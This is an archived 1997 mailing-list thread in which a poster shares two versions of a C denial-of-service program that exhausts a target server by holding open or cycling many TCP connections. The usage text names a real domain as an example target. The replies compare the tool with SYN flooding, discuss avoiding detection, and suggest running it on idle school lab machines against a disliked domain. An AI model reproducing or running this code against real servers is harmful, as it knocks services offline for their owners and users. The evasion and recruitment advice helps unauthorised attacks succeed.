Trash your Enemy's Server
/***************************************************************************/ /* con_dos.c -- Denial Of Service by opening many dangling TCP Connections */ /* Copyright(C) 1997 Ignoramus_Chewed-Off@algebra.com */ /***************************************************************************/ const char * Usage = "Error: %s\n" "USAGE: %s (block|grind) hostname service# #connections\n" "\n" "This program opens #connections connections to the specified host.\n" "It can be used to deny services, slow down and crash Internet servers.\n" "\n" "If #connections is set to 0, it opens as many connections as it can\n" "and continues trying to do so as long as it runs. Use Control-C to \n" "interrupt it. NOTE that depending on your OS, it may hurt you too.\n" "\n" "If #connections is not 0, this program only opens #connections of them.\n" "After that, if the first argument is 'block', it simply sleeps. If the\n" "first argument is 'grind', it starts opening and closing connections\n" "in a round robin manner every second.\n" "\n" "This program is for EDUCATIONAL USE ONLY. Please do not use it for\n" "anything illegal. There is no warranty. Copyright(C) Ignoramus Chewed-Off.\n" "\n" "USE EXAMPLE: \n" " %s grind victim.com 80 1000\n" "-- opens 1000 HTTP connections to victim.com and waits\n" " %s block www.agis.net 80 0\n" "-- constantly attempts to open HTTP connections to www.agis.net\n" ; #include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/types.h> #include <netdb.h> #include <sys/socket.h> #include <netinet/in.h> #define USAGE( msg ) \ fprintf( stderr, Usage, msg, argv[0], argv[0], argv[0] ), \ exit( 1 ) /* after I open this many additional connections (for n_connections == 0), I wait for 1 second, just in case */ #define MAX_CONN 50 typedef enum { CON_BLOCK, CON_GRIND } ConMode; /* create a client socket connected to PORT on HOSTNAME */ int create_client_socket(char ** hostname, int port) { struct sockaddr_in sa ; struct hostent *hp ; int a, s ; long addr ; bzero(&sa, sizeof(sa)) ; if ((addr = inet_addr(*hostname)) != -1) { /* is Internet addr in octet notation */ bcopy(&addr, (char *) &sa.sin_addr, sizeof(addr)) ; /* set address */ sa.sin_family = AF_INET ; } else { /* do we know the host's address? */ if ((hp = gethostbyname(*hostname)) == NULL) { return -2 ; } *hostname = hp->h_name ; bcopy(hp->h_addr, (char *) &sa.sin_addr, hp->h_length) ; sa.sin_family = hp->h_addrtype ; } sa.sin_port = htons((u_short) port) ; if ((s = socket(sa.sin_family, SOCK_STREAM, 0)) < 0) { /* get socket */ return -1 ; } if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { /* connect */ close(s) ; return -1 ; } return s ; } int main( int argc, char *argv[] ) { char * name; int port, n_connections; int s; ConMode mode; if( argc != 5 || (argc >= 1 && (!strcmp( argv[1], "--help" ) || !strcmp( argv[1], "-help" )))) { USAGE( "Wrong Number of Arguments" ); } if( !strcmp( argv[1], "block" ) ) { mode = CON_BLOCK; } else if( !strcmp( argv[1], "grind" ) ) { mode = CON_GRIND; } else { USAGE( "First argument must be 'block' or 'grind'" ); } name = argv[2]; if( (port = atoi( argv[3] ) ) == 0 ) { USAGE( "Port Number must be numeric" ); } if( !isdigit( argv[4][0] ) ) { USAGE( "Port Number must be numeric" );; } n_connections = atoi( argv[4] ); if( n_connections == 0 ) /* infinite loop */ { int i = 0; printf( "ATTENTION: This may damage even your " "computer. Press ^C to abort\n" ); while( 1 ) { if( create_client_socket( &name, port ) == -1 ) { printf( "Connection refused; sleeping.\n" ); sleep( 1 ); } else { if( (i++ % MAX_CONN) == (MAX_CONN-1) ) { printf( "You can interrupt me here. I have %d " "connections open. \nContinuing...\n", i ); sleep( 1 ); } } } } else { int * fds = (int *)calloc( n_connections, sizeof( int ) ); int i = 0; if( fds == 0 ) USAGE( "Memory Allocation Error" ); while( 1 ) /* in a loop, keep opening descriptors */ { if( fds[i] != 0 ) { printf( "Closing %d...\n", i ); close( fds[i] ); sleep( 1 ); } while( 1 ) /* try to open the new one */ { if( (fds[i] = create_client_socket( &name, port )) == -1 ) { printf( "Connection refused; sleeping.\n" ); sleep( 1 ); } else { printf( "Opened %d.\n", i ); break; } } i++; if( i == n_connections ) /* we've gone full circle */ { printf( "Done with %d connections\n", i ); if( mode == CON_BLOCK ) { printf( "I am going to sleep forever...\n", i ); while( 1 ) sleep(1); } else /* repeating the loop */ i = 0; } } } }
Igor writes: [C program which allegedly does a DoS attack on a server] I thought the correct way to do this was to spew packets with random return addresses and fill up the host's listen table with half open TCP connections waiting to time out. Opening 1,000 genuine TCP connections to a host wastes both the host's resources as well as yours, and is a tad obvious should your target log packets with your IP address in them. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd@netcom.com $ via Finger. $
Mike Duvos wrote:
Igor writes:
[C program which allegedly does a DoS attack on a server]
I thought the correct way to do this was to spew packets with random return addresses and fill up the host's listen table with half open TCP connections waiting to time out.
There are patches that protect against this. The DOS attack that you mention has been beaten to death in BugTraq and other places. It worked great until all major OSes were patched. (of course some backwards sites still run unpatched OSes) It is very hard to protect against my attack, because it can only be done at the application level. xinetd _may_ be helpful, though, if the service being attacked is started from [x]inetd.
Opening 1,000 genuine TCP connections to a host wastes both the host's resources as well as yours, and is a tad obvious should your target log packets with your IP address in them.
Yes, BUT most typically a new connection creates only a new file descriptor on the host, and a whole new process on the target host. - Igor.
ichudov@Algebra.COM (Igor Chudov @ home) writes:
#include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/types.h> #include <netdb.h> #include <sys/socket.h> #include <netinet/in.h>
Very good. If I had the time, I would have used the same #ifdefs used in my cancelbot (available at http://www.thecia.net/~kibo/cancelbot.html, btw) to make a Windows 95 binary. Somehow I think the people most likely to use this would be running W95 and have no C compiler, rather than running a flavor of Unix/Linux. Perhaps someless than busy than I am can do this. :-) --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
Dr.Dimitri Vulis KOTM wrote:
ichudov@Algebra.COM (Igor Chudov @ home) writes:
#include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/types.h> #include <netdb.h> #include <sys/socket.h> #include <netinet/in.h>
Very good. If I had the time, I would have used the same #ifdefs used in
Thanks.
my cancelbot (available at http://www.thecia.net/~kibo/cancelbot.html, btw) to make a Windows 95 binary. Somehow I think the people most likely to use this would be running W95 and have no C compiler, rather than running a flavor of Unix/Linux.
I personally experience very unpleasant emotions whenever I have to do anything with Win 95. Perhaps someone else could do it. Also, it is _possible_ that this program will not work too well on Win 95 because it would block other applications. (I am not sure about this)
Perhaps someless than busy than I am can do this. :-)
- Igor.
ichudov@algebra.com (Igor Chudov @ home) writes:
my cancelbot (available at http://www.thecia.net/~kibo/cancelbot.html, btw) to make a Windows 95 binary. Somehow I think the people most likely to use this would be running W95 and have no C compiler, rather than running a flavor of Unix/Linux.
I personally experience very unpleasant emotions whenever I have to do anything with Win 95.
Without getting into OS wars, let me just point out that I'm writing this on an OS/2 box. :-)
Perhaps someone else could do it. Also, it is _possible_ that this program will not work too well on Win 95 because it would block other applications. (I am not sure about this)
It might make the box not very usable for other stuff. I'm thinking of a situation where someone has access to a room full of W95 boxes (e.g. a computer lab at school) left idle for extended time. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
Dr.Dimitri Vulis KOTM wrote:
ichudov@algebra.com (Igor Chudov @ home) writes:
Perhaps someone else could do it. Also, it is _possible_ that this program will not work too well on Win 95 because it would block other applications. (I am not sure about this)
It might make the box not very usable for other stuff.
I'm thinking of a situation where someone has access to a room full of W95 boxes (e.g. a computer lab at school) left idle for extended time.
... or a number of people who have access to idle computers and do not like a particular very annoying domain. The program was designed specifically to be left running forever (in the grind mode with #connections != 0). It should not put a too big strain on the attacking host (except for the Net connection), at least if it runs under linux. By the way, I just made a couple of minor changes (in the way it grinds) and here's the new version. /***************************************************************************/ /* */ /* \=/, _-===-_-====-_-===-_-==========-_-====-_ */ /* | @___oo ( Denial Of Service )_ */ /* /\ /\ / (___,,,}_--= Opens Many Dangling TCP Connections ) */ /* ) /^\) ^\/ _) =__ to swamp TCP servers of your ) */ /* ) /^\/ _) (_ enemies. ) */ /* ) _ / / _) ( ) */ /* /\ )/\/ || | )_) (_ Educational Use Only! ) */ /*< > |(,,) )__) ( Ignoramus_Chewed-Off@algebra.com ) */ /* || / \)___)\ (_ 1997 __) */ /* | \____( )___) )___ -==-_____-=====-_____-=====-___== */ /* \______(_______;;; __;;; */ /* */ /***************************************************************************/ const char * Usage = "Error: %s\n" "USAGE: %s (block|grind) hostname service# #connections\n" "\n" "This program opens #connections connections to the specified host.\n" "It can be used to deny services, slow down and crash Internet servers.\n" "\n" "If #connections is set to 0, it opens as many connections as it can\n" "and continues trying to do so as long as it runs. Use Control-C to \n" "interrupt it. NOTE that depending on your OS, it may hurt you too.\n" "\n" "If #connections is not 0, this program only opens #connections of them.\n" "After that, if the first argument is 'block', it simply sleeps. If the\n" "first argument is 'grind', it starts opening and closing connections\n" "in a round robin manner every second.\n" "\n" "This program is for EDUCATIONAL USE ONLY. Please do not use it for\n" "anything illegal. There is no warranty. Copyright(C) Ignoramus Chewed-Off.\n" "\n" "USE EXAMPLE: \n" " %s grind victim.com 80 1000\n" "-- opens 1000 HTTP connections to victim.com and waits\n" " %s block www.agis.net 80 0\n" "-- constantly attempts to open HTTP connections to www.agis.net\n" ; #include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/types.h> #include <netdb.h> #include <sys/socket.h> #include <netinet/in.h> #define USAGE( msg ) \ fprintf( stderr, Usage, msg, argv[0], argv[0], argv[0] ), \ exit( 1 ) /* after I open this many additional connections (for n_connections == 0), I wait for 1 second, just in case */ #define MAX_CONN 50 typedef enum { CON_BLOCK, CON_GRIND } ConMode; /* create a client socket connected to PORT on HOSTNAME */ int create_client_socket(char ** hostname, int port) { struct sockaddr_in sa ; struct hostent *hp ; int a, s ; long addr ; bzero(&sa, sizeof(sa)) ; if ((addr = inet_addr(*hostname)) != -1) { /* is Internet addr in octet notation */ bcopy(&addr, (char *) &sa.sin_addr, sizeof(addr)) ; /* set address */ sa.sin_family = AF_INET ; } else { /* do we know the host's address? */ if ((hp = gethostbyname(*hostname)) == NULL) { return -2 ; } *hostname = hp->h_name ; bcopy(hp->h_addr, (char *) &sa.sin_addr, hp->h_length) ; sa.sin_family = hp->h_addrtype ; } sa.sin_port = htons((u_short) port) ; if ((s = socket(sa.sin_family, SOCK_STREAM, 0)) < 0) { /* get socket */ return -1 ; } if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { /* connect */ close(s) ; return -1 ; } return s ; } int main( int argc, char *argv[] ) { char * name; int port, n_connections; int s; ConMode mode; if( argc != 5 || (argc >= 1 && (!strcmp( argv[1], "--help" ) || !strcmp( argv[1], "-help" )))) { USAGE( "Wrong Number of Arguments" ); } if( !strcmp( argv[1], "block" ) ) { mode = CON_BLOCK; } else if( !strcmp( argv[1], "grind" ) ) { mode = CON_GRIND; } else { USAGE( "First argument must be 'block' or 'grind'" ); } name = argv[2]; if( (port = atoi( argv[3] ) ) == 0 ) { USAGE( "Port Number must be numeric" ); } if( !isdigit( argv[4][0] ) ) { USAGE( "Port Number must be numeric" );; } n_connections = atoi( argv[4] ); if( n_connections == 0 ) /* infinite loop */ { int i = 0; printf( "ATTENTION: This may damage even your " "computer. Press ^C to abort\n" ); while( 1 ) { if( create_client_socket( &name, port ) == -1 ) { printf( "Connection refused; sleeping.\n" ); sleep( 1 ); } else { if( (i++ % MAX_CONN) == (MAX_CONN-1) ) { printf( "You can interrupt me here. I have %d " "connections open. \nContinuing...\n", i ); sleep( 1 ); } } } } else { int * fds = (int *)calloc( n_connections, sizeof( int ) ); int i = 0; if( fds == 0 ) USAGE( "Memory Allocation Error" ); while( 1 ) /* in a loop, keep opening descriptors */ { if( fds[i] != 0 ) { printf( "Closing %d...\n", i ); close( fds[i] ); } while( 1 ) /* try to open the new one */ { if( (fds[i] = create_client_socket( &name, port )) == -1 ) { printf( "Connection refused; sleeping.\n" ); sleep( 1 ); } else { printf( "Opened %d.\n", i ); break; } } i++; if( i == n_connections ) /* we've gone full circle */ { printf( "Done with %d connections\n", i ); if( mode == CON_BLOCK ) { printf( "I am going to sleep forever...\n", i ); while( 1 ) sleep(1); } else /* repeating the loop */ i = 0; sleep( 1 ); } } } }
participants (3)
-
dlv@bwalk.dm.com -
ichudov@Algebra.COM -
mpd@netcom.com